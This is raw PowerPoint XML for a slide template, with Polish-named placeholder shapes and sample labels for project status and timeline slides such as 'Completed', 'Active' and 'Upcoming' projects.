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handoutMasterIdLst>
    <p:handoutMasterId r:id="rId31"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="279" r:id="rId3"/>
    <p:sldId id="359" r:id="rId4"/>
    <p:sldId id="367" r:id="rId5"/>
    <p:sldId id="368" r:id="rId6"/>
    <p:sldId id="370" r:id="rId7"/>
    <p:sldId id="371" r:id="rId8"/>
    <p:sldId id="372" r:id="rId9"/>
    <p:sldId id="373" r:id="rId10"/>
    <p:sldId id="374" r:id="rId11"/>
    <p:sldId id="375" r:id="rId12"/>
    <p:sldId id="376" r:id="rId13"/>
    <p:sldId id="377" r:id="rId14"/>
    <p:sldId id="378" r:id="rId15"/>
    <p:sldId id="379" r:id="rId16"/>
    <p:sldId id="380" r:id="rId17"/>
    <p:sldId id="381" r:id="rId18"/>
    <p:sldId id="382" r:id="rId19"/>
    <p:sldId id="383" r:id="rId20"/>
    <p:sldId id="384" r:id="rId21"/>
    <p:sldId id="385" r:id="rId22"/>
    <p:sldId id="386" r:id="rId23"/>
    <p:sldId id="387" r:id="rId24"/>
    <p:sldId id="388" r:id="rId25"/>
    <p:sldId id="389" r:id="rId26"/>
    <p:sldId id="390" r:id="rId27"/>
    <p:sldId id="391" r:id="rId28"/>
    <p:sldId id="392" r:id="rId29"/>
    <p:sldId id="36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03B1046-DCF6-48A4-A75E-088AD02CCEF8}">
          <p14:sldIdLst>
            <p14:sldId id="279"/>
            <p14:sldId id="359"/>
            <p14:sldId id="367"/>
            <p14:sldId id="368"/>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69"/>
          </p14:sldIdLst>
        </p14:section>
      </p14:sectionLst>
    </p:ex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71C"/>
    <a:srgbClr val="1B2E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 pośredni 2 — Ak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975" autoAdjust="0"/>
    <p:restoredTop sz="94660" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="93" d="100"/>
          <a:sy n="93" d="100"/>
        </p:scale>
        <p:origin x="-512" y="-74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9C992D-86EE-4B77-9D4C-0D3138F2A9C0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14.05.15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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B8BC91-471F-4613-9B72-F3B8D2320248}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38704821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1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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7" y="2955779"/>
            <a:ext cx="3966584"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34" name="Prostokąt 33"/>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64"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74967"/>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 name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6521143" y="5208887"/>
            <a:ext cx="684861" cy="632179"/>
            <a:chOff x="5779" y="5058"/>
            <a:chExt cx="624" cy="576"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36"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6"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65" name="Symbol zastępczy tekstu 33"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285229" y="3962355"/>
            <a:ext cx="3978545" cy="835676"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1277509957"/>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Title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Symbol zastępczy zawartości 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286942" y="1196976"/>
            <a:ext cx="2762088" cy="500856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5" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3202619" y="1196976"/>
            <a:ext cx="2762088" cy="5008562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="359991">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Click to edit content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Symbol zastępczy zawartości 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6118322" y="1196976"/>
            <a:ext cx="2762088" cy="5008562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="359991">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Click to edit content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3573769814"/>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9"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dirty="0" smtClean="0"/>
              <a:t>Click to edit content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Symbol zastępczy zawartości 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695656" y="1196974"/>
            <a:ext cx="4184754" cy="2435912"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="359991">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>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359991">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Click to edit content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1056582062"/>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4695656" y="1196974"/>
            <a:ext cx="4184754" cy="243591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359991">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Click to edit content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Symbol zastępczy zawartości 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="28691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1370338824"/>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dirty="0" smtClean="0"/>
              <a:t>Click to edit content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9"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413705790"/>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ubtitle Full size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878226"/>
            <a:ext cx="8593931"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402572127"/>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7" name="Symbol zastępczy zawartości 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4660643" y="1878226"/>
            <a:ext cx="4219769" cy="4327311"/>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388228406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dirty="0" smtClean="0"/>
              <a:t>EDIT SUBTITLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Symbol zastępczy zawartości 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286942" y="1878226"/>
            <a:ext cx="2762088" cy="4327311"/>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4" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3202619" y="1878226"/>
            <a:ext cx="2762088" cy="4327311"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="359991">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Click to edit content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Symbol zastępczy zawartości 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6118322" y="1878226"/>
            <a:ext cx="2762088" cy="4327311"/>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418046922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825296045"/>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4695656"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651362537"/>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5"/>
            <a:ext cx="9144000" cy="6316663"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Full size screen shot.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Right click to paste picture if copying from other slide. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Left click in center to browse for file to place.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84403732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8" y="2955779"/>
            <a:ext cx="3997406"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4" name="Symbol zastępczy tekstu 33"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286942" y="3958416"/>
            <a:ext cx="3997382" cy="828675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2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6"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74967"/>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ymbol zastępczy tekstu 33"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274955" y="4840282"/>
            <a:ext cx="3999094"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9" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6521143" y="5208887"/>
            <a:ext cx="684861" cy="632179"/>
            <a:chOff x="5779" y="5058"/>
            <a:chExt cx="624" cy="576"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10"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6"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942159880"/>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Status</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286941" y="2174794"/>
            <a:ext cx="2762250" cy="4030749"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Completed projects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6118160" y="2174794"/>
            <a:ext cx="2762250" cy="4030749"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Upcoming projects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3202538" y="2174794"/>
            <a:ext cx="2762250" cy="4030749"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Active projects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Prostokąt 10"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286919" y="1421032"/>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ole tekstowe 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="721821" y="1509581"/>
            <a:ext cx="1568250" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>COMPLETED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Prostokąt 12"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3202515" y="1421032"/>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pole tekstowe 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3643947" y="1509581"/>
            <a:ext cx="976742" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ACTIVE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Prostokąt 14"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6118162" y="1421032"/>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pole tekstowe 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6523004" y="1509581"/>
            <a:ext cx="1480085" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UPCOMING</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Obraz 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239625" y="1578756"/>
            <a:ext cx="205779" cy="215882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Obraz 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="425049" y="1556141"/>
            <a:ext cx="226223" cy="238498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Obraz 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3323322" y="1509585"/>
            <a:ext cx="224784" cy="323373"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="907922287"/>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Timeline</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Prostokąt 10"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286918" y="1421032"/>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Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6326156"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18" name="Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6326156" y="4712870"/>
            <a:ext cx="2554255" cy="1505053"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Upcoming projects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6326156" y="3066951"/>
            <a:ext cx="2554255" cy="1505053"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Active projects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Prostokąt 24"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286916" y="3061199"/>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Prostokąt 25"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286917" y="4712870"/>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Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3574430"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28" name="Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3574430" y="4712870"/>
            <a:ext cx="2554255" cy="1505053"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Upcoming projects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3574430" y="3066951"/>
            <a:ext cx="2554255" cy="1505053"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Active projects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822703"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31" name="Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822703" y="4712870"/>
            <a:ext cx="2554255" cy="1505053"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Upcoming projects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="27" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
